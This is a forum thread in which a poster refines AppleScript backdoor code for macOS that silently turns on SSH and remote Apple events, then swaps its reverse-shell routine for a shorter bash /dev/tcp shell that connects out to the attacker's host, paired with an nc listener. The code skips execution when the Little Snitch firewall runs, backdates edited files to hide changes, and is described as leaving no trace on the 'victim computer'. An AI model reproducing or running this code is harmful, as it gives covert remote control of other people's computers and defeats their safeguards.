    do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
    do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
end if

squalb3ta
So for 10.5.5 and later change the enable_ssh like this
CODE
on enable_ssh()
    if debug then log_event("enable_ssh")
    try
        if i_am_an_admin then
            if OSX_version_number_minor as number ≥ 5 then --For Leopard
                do shell script "/usr/sbin/systemsetup -setremotelogin on &"
                --And while I'm here...
                do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
                do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
                do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
                do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
            else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
                do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
                --And while I'm here...
                do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
                do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
                do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
                do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
            end if
        end if
    end try
    if i_have_root_access then
        try
            if OSX_version_number_minor as number ≥ 5 then --For Leopard
                do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremotelogin on &"
                --And while I'm here...
                do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
                do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartpowerfailure on &"
                do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setrestartfreeze on &"
                do shell script "/usr/bin/sudo /usr/sbin/systemsetup -setremoteappleevents on &"
            else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
                do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
                --And while I'm here...
                do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
                do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
                do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
                do shell script "/usr/bin/sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
            end if
        end try
        try
            --This handler needs root for everything past this point! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
            if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
                --Note, this also opens port 22 in the default OS X firewall
                do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist &"
            else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then --For Jaguar and Panther
                do shell script "/usr/bin/sudo mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.AStht && /usr/bin/sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh.AStht > /private/etc/xinetd.d/ssh && /usr/bin/sudo touch -r /private/etc/xinetd.d/ssh.AStht /private/etc/xinetd.d/ssh 2>/dev/null"
                do shell script "/usr/bin/sudo /sbin/service ssh start"
            else --For Puma and Cheetah
                --Still need to also open port 22 in the firewall (ipfw)!
                do shell script "/usr/bin/sudo sed -e 's/SSHSERVER=-NO-/SSHSERVER=-YES-/' /etc/hostconfig > /var/tmp/hostconfig && /usr/bin/sudo mv /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "grep 'SSHSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'SSHSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
                do shell script "/usr/bin/sudo /usr/sbin/sshd &"
            end if
        end try
    end if
end enable_ssh


squalb3ta
Hmm, for the reverse SSH I found a few minor bugs.

And there is a much simpler solution :)

On the victim host just do
CODE
bash -i >& /dev/tcp/YourHost/YourPort 0>&1


And on your machine always have a listening process like this
CODE
nc -l -vvv YourPort



So you should surely replace all this code in ASTtemplate:
CODE
#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
    $input >&6 2>&6
    echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0


Hmm, one error there: add "head -n 1" and remove the grep -v [:alpha:] here
CODE
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )



So you could replace all of this with just
CODE
#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | head -n 1 | sed -e 's/^.*address //' -e 's/ .*//'  )
bash -i >& /dev/tcp/${address}/" & masters_netcat_port & " 0>&1


remember that on your own host you have to run
CODE
nc -l -vvv yourport


With this, everything you type is piped to bash on the victim computer and the answer is sent back to you. Nothing is written/shown on the victim computer :)

I'll surely open a new thread with a few reverse shell techniques :)
Invision Power Board © 2001-2010 Invision Power Services, Inc.